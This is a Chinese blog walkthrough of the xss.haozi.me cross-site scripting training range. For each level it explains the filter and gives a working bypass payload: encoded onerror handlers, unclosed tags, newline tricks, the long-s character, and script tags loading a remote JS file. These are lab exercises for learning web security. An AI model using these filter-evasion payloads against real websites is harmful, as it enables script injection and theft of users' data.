xss靶场之xss.haozi

最新推荐文章于 2024-07-03 19:12:25 发布
最新推荐文章于 2024-07-03 19:12:25 发布
阅读量653 收藏 8
点赞数 28
文章标签: xss web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46954909/article/details/139371703
版权

靶场网址:alert(1)​​​​​

一:0x00:无限制

这题没什么限制,直接构造语句就可以了。

二:0x01:闭合类型。

这题我们知道,如果我们直接输入就会在textare标签中,不会执行我们的js语句,所以我们可以尝试去先闭合再写我们的js语句。

三:0x02:闭合类型

这题我们观察到直接输入,他是在input语句的属性值中,无法执行我们的js语句,所以我们的思路也是直接闭合掉语句,执行js语句。

四:0x03:括号绕过

这题显而易见的是括号不能使用了,我们的办法是替代法和进行编码,使用`来替代()或者使用编码的方式来替代掉括号,但要注意的是,script不能解析编码,所以script标签不能用编码的方式。

使用`的方式:<script>alert`1`</script>

使用编码的方式:因为script不能使用编码所以使用img来实现。
<img src=0 οnerrοr=alert&#40;1&#41

五:0x04:括号和`的绕过。

这题与上题一样,只不过是将括号和`都不能使用了,但是可以使用编码的方式,绕过。
<img src=0 οnerrοr=alert&#40;1&#41>

六:0x05:闭合类型

这题主要考察的也是闭合的思路,因为我们直接输入的东西会被注释掉,所以我们直接闭合就完了,但这不要被迷惑住了,<!-- -->这个会变成一个表情包,但是我们只要是对称的标签就能注释掉。
--!><script>alert(1)</script>

七:0x06:input标签的绕过。

这题给出的限制条件是对auto和on开头只要加上等号就会变为下划线,加上大于号大于号也会变为下划线,也就是说过滤了autoforce和onerror事件。我们可以使用一个换行的技巧前提要加一个type属性值image和src映射路径属性,然后再让等于号和属性分开。

type=image src=0 onerror
=alert(1)

八:0x07:闭合替换绕过

这题当我们的标签一闭合它就会替换为空。所以只要我们构造一个标签不闭合也能执行js语句的就可以了。
<img src=0 οnerrοr=alert(1)
 

一定要空一个格出来,或者换行,否则可能会失败。

九:0x08:闭合类型

这题主要是如果程序检测到我们存在</style>就会替换成其他标识,使我们的闭合失败,所以我们根据前面的经验,只要不闭合就好了。

</style
>
<img src=0 οnerrοr=alert(1)

十:0x09:闭合类型。

这题的主要还是他需要输入一个特定的网址他才会给系统去执行命令,所以我们先输入网址再闭合就能执行我们的js语句了。

https://www.segmentfault.com"></script><script>alert(1)</script>

十一:0x0A:转跳绕过

这题与上题类似,也是只有输入特定的网址才会执行,但是他添加了其他条件,他将:‘/等都符好都替换掉了,所以不能像上一题那样,而且根据他的语句是访问链接,我们就可以让他定位到一个写好的xss链接中。

https://www.segmentfault.com.haozi.me/j.js

十二:0x0B:h1标签绕过1

与上一题差不多,只不过是本题的主要点还是大写,因为alert与ALERT不是同一个意思,所以需要注意,但我们也可以使用上题的方式,因为script是不管大小写的。

<script src="https://www.segmentfault.com.haozi.me/j.js"></script>

除了这个还有其他的一些方法。

亦或者:前面都演示过了,不多解释。

十三:0x0C:h1标签绕过2

这题与上一题基本一致,但是本题将script禁掉了,使用我们只能另寻它法。我们可以通过编码的方式绕过h1标签的影响。

<img src=0 οnerrοr=&#97;&#108;&#101;&#114;&#116;(1)>

十四:0x0D:注释?

这题因为已经有script了,而且注释也只是注释当前行,所以换号=行就能直接绕过了,最后再用-->注释掉‘)即可。

)
alert(1)
-->

十五:0x0E:特色符号绕过

这题主要是学习一个特色字符:ſ相当于s,因为本题如果输入<加一个字母就会变成<_,但是特殊字符就不会,所以。
<ſcript src="https://www.segmentfault.com.haozi.me/j.js"></script>

或者

十六:0x0F:闭合类型

这题没什么好说的,就是闭合+注释,搭配上script语句就可以了,虽然将&,’”<>/\都编码了,但是这就是典型的骗自己,因为即时编码了,但在img标签里也是能解析的,所以相当于徒劳。

');alert(1)
//

十七:0x10:无

这题更是没什么好说的,就了解一下Window函数对象表示在浏览器中打开的窗口。

alert(1)

十八:0x11:闭合类型

这题看着挺吓人,但实际一坨,就是将原本的“变为了\”,但是一点也不影响我们的构造语句。

");alert(1)//

十九:0x12:闭合类型

这题就是将"换成了\",但是我们可以根据此就构造语句,最后注释掉不需要的就可以了。

\");alert(1)
//

总结:大多都是对网页源码的分析,闭合类型居多,完,如果有问题欢迎一起来探讨,如有错误也希望多多指正。

安全检测中
关注
  • 28
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql和xss靶场资料包.zip
12-21
bWAPP latest.zip DVWA-master.zip pikachu-master.zip sqli-labs-master.zip upload-labs-master-21.zip xss闯关小游戏.Zip xxe-lab-masteri靶场.rar PhpStudy20180211.zip vc9x86(必装).eXe vc11 x86.exe
xss.haozi.me靶场详解
m0_46467017的博客
07-28 2109
由于xss.haozi.me是一个在线靶场,服务部署在Github,若网速不好,则需要科学上网。由于本靶场是一个白盒测试的靶场,我们可以看到代码的源码,所以可以直接根据源码的限制的条件来思考如何绕过。...
xss.haozi教程-史上最全详解
qq_52364123的博客
04-11 741
靶场:https://xss.haozi.me/
xss.haozi练习通关详解
金色%夕阳的博客
08-01 1946
xss.haozi练习通关概述 0x00 分析: 执行: 0x01 分析: 执行: 0x02 分析: 执行: 0x03 分析: 执行: 0x04 分析: 执行: 0x05 分析: 执行: 0x06 分析: 执行: 0x07
XSS haozi靶场通关笔记
I_WORM的博客
01-31 2295
xss专练靶场xss.haozi.me靶场通关笔记
xss.haozi.me靶场“0x00-0x0A”通关教程
钟言的博客
03-12 5399
本篇介绍了xss.haozi.me靶场0x00到0x0A通关教程,详细内容包含了:一、靶场介绍 二、第一关 0x00 不做限制 三、第二关 0x01 文本闭合标签绕过 四、第三关 0x02 双引号闭合绕过 五、第四关 0x03 过滤括号 六、第五关 0x04 编码绕过 七、第六关 0x05 注释闭合绕过 八、第七关 0x06 换行绕过 九、第八关 0x07 删除标签 十、第九关 0x08 多加空格绕过 十一、第十关 0x09 闭合绕过 十二、第十一关 0x0A JS调用等内容
xss.haozi.me靶场“0x0B-0x12”通关教程
钟言的博客
03-13 4532
本篇xss.haozi.me靶场的“0x0B-0x12”通关教程,详细内容包含了一、0x0B 实体编码绕过 二、0x0C script绕过 三、0x0D 注释绕过 四、0X0E ſ符号绕过 五、0x0F 编码解码 六、0x10 直接执行 七、0x11 闭合绕过 八、0x12 闭合绕过等内容
xss.js.zip
07-29
"xss.js.zip"是一个专注于防止XSS攻击的JavaScript模块,它通过严格的输入过滤和白名单策略来确保用户提交的内容不会引入潜在的恶意代码。 首先,"xss.js"的核心功能在于提供了一套完整的输入过滤机制。这个模块会...
xss-labs-master.rar
05-09
XSS实验室详解:从入门到精通》 XSS(Cross-site scripting)是一种常见的Web应用程序安全漏洞,允许攻击者在用户浏览器中注入恶意脚本。"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助...
xss-platform-master.zip
04-21
其中,XSS(Cross-Site Scripting,跨站脚本攻击)是Web应用最常见的安全漏洞之一。"xss-platform-master.zip"是一个关于XSS攻防研究的项目,它包含了名为"xss_platform-master"的子目录,旨在帮助开发者和安全研究...
xss-demo-master.zip
04-21
XSS漏洞详解与实战演示》 XSS(Cross Site Scripting)攻击是一种常见的网络安全问题,它发生在Web应用中,允许攻击者通过注入恶意脚本到网页上,从而影响到其他用户。"xss-demo-master.zip"这个压缩包很可能是为...
XSS漏洞:xss.haozi.me靶场通关
qq_68163788的博客
01-18 2055
xss.haozi.me是一个专门用于测试和学习跨站脚本(XSS)漏洞的靶场XSS漏洞是一种常见的Web安全漏洞,攻击者通过在网页中注入恶意脚本,可以获取用户的敏感信息,如Cookie、会话令牌等。 通关xss.haozi.me靶场意味着成功利用了该靶场中的XSS漏洞,并完成了相应的任务。在这个过程中,你需要利用各种XSS漏洞,包括反射型XSS、存储型XSS等,来实现跨站脚本攻击,并获取相应的flag或者完成指定的任务。 通过通关xss.haozi.me靶场,你可以提升自己的Web安全技能,了解XSS
xss靶场xss.haozi.me靶场详细通关教程
LawnCat的博客
03-27 2308
靶场来自xss.haozi.me,其中一些解题方法也是根据官方的题解。该文章主要用于记录自己的学习历程。xss.haozi.me是一个学习xss漏洞非常不错的靶场,里面集合了各种绕过方式,对于小白来说非常具有学习意义。
xss.haozi.me通关教程
自强不息
02-01 1204
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
XSS-haozi
个人博客
08-10 359
https://xss.haozi.me/ XSS学习 github项目地址:haozi/xss-demo: ????????‍♂️ xss 攻防靶场,issues 有答案 (github.com) 0x00 server code function render (input) { return '<div>' + input + '</div>' } payload <script>alert(1)</script> 未做处理 0x01 ser
xss靶场haozi.me过关
最新发布
2301_80063785的博客
07-03 217
过滤了html标签,使用onerror绕过(onerror不依靠标签触发)"被替换为\",所以依旧可以使用,再使用分号隔开以及利用后面的")完成输出。普通字符标签被添加‘_’,使用特殊字符‘ ſ ’,ſ 与s相同。被替换,因为正则不能匹配空格,所以添加空格。由于编码在html标签中,所以被替换的编码会被还原再执行。先输入固定网址,然后闭合,进行报错绕过。没有任何过滤,直接使用script标签。对 ` 也进行了过滤,使用编码绕过。没有过滤script标签,直接闭合。
xss.haozi.me
沐目的博客
07-09 5068
集训第二周 星期一 第二个星期了,再发一篇。感觉自己好像没学什么东西。就学了个HTML和JavaScript。今天开始XSS的实战,这篇博客主要就是写一下题解。 先给出XSS靶场的地址: https://xss.haozi.me/#/0x00 我是在谷歌上写的,不知道为什么同样的payload在火狐上不能用。 0x00 第一关应该没什么讲的吧,啥都没有,直接给payload了。 <img ...
centos7删除xss靶场
07-25
要删除CentOS 7上的XSS靶场,按照以下步骤进行操作: 1. 首先,登录到CentOS 7服务器。 2. 找到XSS靶场的安装目录。通常情况下,靶场的文件会存储在/var/www/html/或/opt目录下。你可以使用以下命令来查找: ```...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值